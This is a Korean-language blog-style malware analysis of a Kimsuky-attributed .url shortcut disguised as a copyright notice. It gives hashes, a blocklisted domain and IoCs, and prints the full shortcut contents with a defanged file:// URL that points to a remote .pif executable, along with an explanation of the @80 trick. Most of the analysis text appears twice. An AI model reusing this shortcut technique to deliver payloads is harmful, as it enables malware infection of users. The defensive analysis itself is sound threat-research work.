북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21)
Contents
오늘은 정말로 존경 하나도 하지 않은 민폐인 북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21)에 대해 알아보겠습니다.
해당 악성코드는 저작권 관련해서 사칭하는 것을 볼 수가 있으며 제목 또한 저작권관련내역.url으로 보면 쉽게 추측할 수 있습니다.
파일명:저작권관련내역(.)url
사이즈:1 MB
MD5:66bd429d02479a029a25ccacc0d134b3
SHA-1:2e6ab2f8e5a24c9d9acde16589cfd34d0ee5b5c0
SHA-256:755e3c5c62ac683bbea831255c4ee3bcb639232efab95a42bfa77b5322b3fd9c
invoice-docs-file(.)site 도메인은 멀웨어 활동과 연관돼 있으며 Spamhaus DBL 에도 당당하게 등록된 도메인이며 피싱(Phishing) 공격에 많이 사용된 도메인
악성코드 포함된 코드
[{009862A0-0000-0000-C000-000000005986}]
Prop3=19,2
[InternetShortcut]
IconIndex=11
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
IDList=
URL=fi(l)e://invoice-docs-file(.)site@80/Downloads/ready(.)pif
HotKey=0
[{000214A0(-)0000(-)0000-C000-000000000046}]
Prop3=19,9
코드 분석
인터넷 바로 가기(Internet Shortcut) 로 위장
1. 파일 확장자 및 형식
(.)url 파일은 단순한 텍스트 포맷의 바로가기 파일
하지만, 내부 URL= 항목을 조작하여 악성코드 실행을 유도
2.악성 URL 포맷
f(i)le://->로컬 파일 시스템 접근
invoice-docs(-)file(.)site@80->도메인을 가장한 사용자명
실제 연결은 80 포트의 로컬 서버로 시도
phishing 기법으로 사람에게는 invoice-docs-file(.)site 라는 도메인처럼 보이지만 실제로는 80/Downloads/ready(.)pif 를 참조하는 방식
Windows에서는 해당 URL을 f(i)le:// 로 시작하므로 로컬 파일을 실행하려는 시도로 해석도 가능
ready.pif->.pif 확장자는 옛날 윈도우 에서 사용하는 Program Information File
실제로는 실행 파일(.exe)처럼 작동 쉽게. pif로 만들어져 유포되었으며 EXE 확장자와 같은 실행 가능한 파일
2021년 2021년 국방부 업무보고 수정 로 위장해서 공격했을 때 해당 비슷하게 악용
악성코드가. pif 확장자를 사용해 감염을 우회하려는 …
해당 악성코드는 저작권 관련해서 사칭하는 것을 볼 수가 있으며 제목 또한 저작권관련내역.url으로 보면 쉽게 추측할 수 있습니다.
파일명:저작권관련내역(.)url
사이즈:1 MB
MD5:66bd429d02479a029a25ccacc0d134b3
SHA-1:2e6ab2f8e5a24c9d9acde16589cfd34d0ee5b5c0
SHA-256:755e3c5c62ac683bbea831255c4ee3bcb639232efab95a42bfa77b5322b3fd9c
invoice-docs-file(.)site 도메인은 멀웨어 활동과 연관돼 있으며 Spamhaus DBL 에도 당당하게 등록된 도메인이며 피싱(Phishing) 공격에 많이 사용된 도메인
악성코드 포함된 코드
[{009862A0-0000-0000-C000-000000005986}]
Prop3=19,2
[InternetShortcut]
IconIndex=11
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
IDList=
URL=fi(l)e://invoice-docs-file(.)site@80/Downloads/ready(.)pif
HotKey=0
[{000214A0(-)0000(-)0000-C000-000000000046}]
Prop3=19,9
코드 분석
인터넷 바로 가기(Internet Shortcut) 로 위장
1. 파일 확장자 및 형식
(.)url 파일은 단순한 텍스트 포맷의 바로가기 파일
하지만, 내부 URL= 항목을 조작하여 악성코드 실행을 유도
2.악성 URL 포맷
f(i)le://->로컬 파일 시스템 접근
invoice-docs(-)file(.)site@80->도메인을 가장한 사용자명
실제 연결은 80 포트의 로컬 서버로 시도
phishing 기법으로 사람에게는 invoice-docs-file(.)site 라는 도메인처럼 보이지만 실제로는 80/Downloads/ready(.)pif 를 참조하는 방식
Windows에서는 해당 URL을 f(i)le:// 로 시작하므로 로컬 파일을 실행하려는 시도로 해석도 가능
ready.pif->.pif 확장자는 옛날 윈도우 에서 사용하는 Program Information File
실제로는 실행 파일(.exe)처럼 작동 쉽게. pif로 만들어져 유포되었으며 EXE 확장자와 같은 실행 가능한 파일
2021년 2021년 국방부 업무보고 수정 로 위장해서 공격했을 때 해당 비슷하게 악용
악성코드가. pif 확장자를 사용해 감염을 우회하려는 …
IoC
66bd429d02479a029a25ccacc0d134b3
2e6ab2f8e5a24c9d9acde16589cfd34d0ee5b5c0
755e3c5c62ac683bbea831255c4ee3bcb639232efab95a42bfa77b5322b3fd9c
2e6ab2f8e5a24c9d9acde16589cfd34d0ee5b5c0
755e3c5c62ac683bbea831255c4ee3bcb639232efab95a42bfa77b5322b3fd9c